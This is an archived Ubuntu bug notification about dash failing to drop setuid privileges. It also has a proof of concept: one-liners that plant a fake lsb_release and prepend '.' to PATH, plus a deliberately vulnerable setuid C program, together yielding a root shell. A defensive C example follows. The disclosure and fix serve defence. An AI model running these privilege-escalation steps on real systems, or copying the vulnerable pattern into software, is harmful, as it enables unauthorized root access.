
touch-packages team mailing list archive

[Bug 1215660] Re: dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()


correction on my previous comment:

My point "1" is only true on Debian and derivatives. bash does drop its
privilege when setuid and called as sh without -p just like when not
called as sh, but Debian's bash package has a patch that disables that
dropping of privileges when called as sh.

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

** Bug watch added: Debian Bug tracker #52586
   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dash in Ubuntu.
https://bugs.launchpad.net/bugs/1215660

Title:
  dash does not drop privileges when euid != uid, this can cause local
  root exploits when setuid programs use system() or popen()

Status in dash package in Ubuntu:
  Triaged

Bug description:
  Poorly written setuid programs may call 'popen' or 'system' with
  incorrectly specified arguments. For instance, there is a bug in
  vmware-mount where it calls "popen('lsb-release')" (CVE-2013-1662). It
  should be "popen('/usr/bin/lsb-release')". Because of this, an
  attacker can drop a file named 'lsb-release' in . and then call
  vmware-mount, and it will happily popen the attacker controlled file
  as root.

  Now, bash has a 'privdrop' option, however Debian removed this option in the 1990s:
  http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff and
  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

  Most shells will drop privs when euid != uid, because it turns out
  calling popen / system from setuid scripts is nearly impossible to get
  right (in fact, pretty much any setuid script is insanely difficult to
  write without a vulnerability in it).

  Ensure /bin/sh is dash
  antarus@goats5 ~ $ sudo ln -sf /bin/dash /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
  # whoami
  root

  If we switched to a sane shell (like busybox, for example):
  antarus@goats5 ~ $ sudo ln -sf /bin/busybox /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("/bin/sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount

  BusyBox v1.18.5 (Ubuntu 1:1.18.5-1ubuntu4.1) built-in shell (ash)
  Enter 'help' for a list of built-in commands.

  /usr/local/google/home/antarus $ whoami
  whoami: unknown uid XXXXX # I have omitted my actual UID, needless to say it isn't uid 0 :)

  Now you may be saying 'hey, I don't have vmware-mount handy', so
  instead:

  antarus@goats5 ~ $ cat /tmp/silly_setuid.c
  #include <stdio.h>

  /* Deliberately minimal setuid program for the demonstration: it hands
     a bare command name to popen(), which /bin/sh resolves through the
     caller-controlled PATH instead of an absolute path. */
  int main(int argc, char ** argv) {
    popen("lsb_release", "r");
  }

  antarus@goats5 ~ $ gcc /tmp/silly_setuid.c -o silly_setuid
  antarus@goats5 ~ $ sudo chown root:root silly_setuid 
  [sudo] password for antarus: 
  antarus@goats5 ~ $ sudo chmod 4755 silly_setuid 
  antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("whoami>`tty` 2>&1");}';PATH=.:$PATH silly_setuid
  antarus@goats5 ~ $ root

  Distributor ID: Ubuntu
  Description:    Ubuntu 12.04.1 LTS
  Release:        12.04
  Codename:       precise

  antarus@goats5 ~ $ apt-cache policy dash
  dash:
    Installed: 0.5.7-2ubuntu2
    Candidate: 0.5.7-2ubuntu2
    Version table:
   *** 0.5.7-2ubuntu2 0
          600 my-apt-mirror ubuntu-precise/main amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dash/+bug/1215660/+subscriptions
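The two defensive points raised in this thread, shown together as an added C example (not code from the bug report, nor from dash, bash or any of the packages mentioned): a setuid program should never hand a bare command name to system() or popen(), since /bin/sh then resolves it through the caller's PATH, but should exec an absolute path with a fixed environment and no shell in between; and a process that finds euid != uid should reset its effective ids to the real ones before doing anything environment-dependent, which is exactly the check the report says dash lacks. The names drop_privileges, run_helper, needs_path_lookup and SAFE_ENV are this example's own and are not part of any of the projects discussed.

```c
/* Added example, not from the bug report. Demonstrates how a setuid
 * helper should launch a child program instead of using system()/popen()
 * with a relative name, and how a setuid process checks for and drops
 * an elevated effective uid/gid. All function names here are hypothetical. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed environment handed to every child: the caller's PATH and IFS are
 * never consulted, so dropping a file named like the helper into "." or
 * prepending "." to PATH has no effect on what gets executed. */
static char *const SAFE_ENV[] = {
    "PATH=/usr/sbin:/usr/bin:/sbin:/bin",
    "IFS= \t\n",
    NULL,
};

/* Return 1 if the command name would be resolved through PATH (it has no
 * '/'), 0 if it is an explicit path. A relative name is the defect shown
 * by silly_setuid.c and the vmware-mount report above. */
int needs_path_lookup(const char *cmd) {
    return strchr(cmd, '/') == NULL;
}

/* If the process is running setuid/setgid (effective ids differ from the
 * real ids), reset the effective ids to the real ones. This mirrors the
 * check most shells perform on startup and dash does not. Returns 0 on
 * success, -1 if the drop failed or did not take effect. */
int drop_privileges(void) {
    uid_t uid = getuid();
    gid_t gid = getgid();
    /* Group first: once uid is dropped, the process can no longer setgid(). */
    if (getegid() != gid && setgid(gid) != 0) return -1;
    if (geteuid() != uid && setuid(uid) != 0) return -1;
    /* Never trust the return value alone; confirm the ids actually changed. */
    if (geteuid() != uid || getegid() != gid) return -1;
    return 0;
}

/* Run an explicitly pathed program with the given argv and SAFE_ENV,
 * without involving /bin/sh, and return its exit status. Returns -1 if the
 * name is relative, fork/waitpid fails, or the child did not exit normally
 * (execve failure is reported as exit status 127). */
int run_helper(const char *path, char *const argv[]) {
    if (needs_path_lookup(path)) return -1;   /* refuse PATH-resolved names */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(path, argv, SAFE_ENV);         /* no shell, no inherited env */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Same intent as silly_setuid.c, done safely: absolute path, no shell. */
    char *const argv[] = {"lsb_release", "-a", NULL};
    int rc = run_helper("/usr/bin/lsb_release", argv);
    printf("helper exit status: %d (127 means the binary is absent)\n", rc);
    return 0;
}
```

If the program genuinely needs to stay privileged for part of its work, call drop_privileges() before the first run_helper(); if it needs no privilege at all after startup, call it as the very first thing in main(), which is also the point at which a shell started with euid != uid should reset its ids.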